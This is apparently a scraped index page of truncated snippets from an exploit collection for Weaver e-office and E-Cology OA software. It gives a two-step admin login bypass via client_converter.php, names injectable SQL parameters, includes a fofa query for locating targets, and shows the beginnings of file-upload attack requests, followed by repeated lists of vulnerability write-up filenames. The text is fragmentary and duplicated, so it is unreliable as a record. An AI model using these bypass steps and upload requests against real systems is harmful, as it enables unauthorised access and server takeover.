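Vulnerability title: Multiple SQL injections in a file in Weaver Eoffice, plus a login bypass that allows direct operation of the admin backend. SQL injection: /client_converter.php //userAccount lang funcID Unauthorized access: Step 1: /client_converter.php?userAccount=admin =cn (assigns values to the session) Step 2: /general/system/user/userlist.php Bug ID: wooyun-2015-0112675 Vulnerability title: Weaver's OA system (Weaver E-CO...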
The Weaver /webservice/upload/upload.php endpoint has an arbitrary file upload vulnerability that leads to gaining server privileges. fofa app="泛微-EOffice" poc POST /webservice/upload/upload.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept-Encoding: gzip, ...
Weaver e-office V9.0 vulnerability reproduction: POST http://ip:port/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept-Enco...
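Weaver-EMobile weak password vulnerability.md; Weaver-OA system ResourceServlet endpoint arbitrary file read vulnerability.md; Weaver-eoffice-webservice-file-upload arbitrary file upload vulnerability.md; Weaver E-Cology-KtreeUploadAction arbitrary file upload vulnerability.md; Weaver E-Cology9 platform QRcodeBuildAction authentication bypass leading to SQL injection vulnerability.md; Weaver E-Cology endpoint getFi...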
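Weaver-OA system ResourceServlet endpoint arbitrary file read vulnerability.md; Weaver-eoffice-webservice-file-upload arbitrary file upload vulnerability.md; Weaver E-Cology-KtreeUploadAction arbitrary file upload vulnerability.md; Weaver E-Cology endpoint getFileViewUrl SSRF vulnerability.md; Weaver E-Cology system endpoint ReceiveCCRequestByXml XXE vulnerability.md; Weaver E-Cology system endpoint Si...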
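Weaver HrmCareerApplyPerView SQL injection vulnerability.md; Weaver-EMobile weak password vulnerability.md; Weaver-OA system ResourceServlet endpoint arbitrary file read vulnerability.md; Weaver-eoffice-webservice-file-upload arbitrary file upload vulnerability.md; Weaver E-Cology-KtreeUploadAction arbitrary file upload vulnerability.md; Weaver E-Cology9 platform QRcodeBuildAction authentication bypass...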
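Weaver E-Mobile system endpoint installOperate.do SSRF vulnerability.md; Weaver E-Office-json_common.php SQL injection vulnerability.md; Weaver E-Office-jx2_config information disclosure vulnerability.md; Weaver E-Office-uploadfile.php arbitrary file upload vulnerability.md; Weaver E-Office10-OfficeServer arbitrary file upload vulnerability.md; Weaver E-Office10 versions earlier than v10.0_20240222...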
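Weaver-OA system ResourceServlet endpoint arbitrary file read vulnerability.md; Weaver-eoffice-webservice-file-upload arbitrary file upload vulnerability.md; Weaver E-Cology-KtreeUploadAction arbitrary file upload vulnerability.md; Weaver E-Cology9 platform QRcodeBuildAction authentication bypass leading to SQL injection vulnerability.md; Weaver E-Cology endpoint getFileViewUrl SSRF vulnerability.md; Weaver E-...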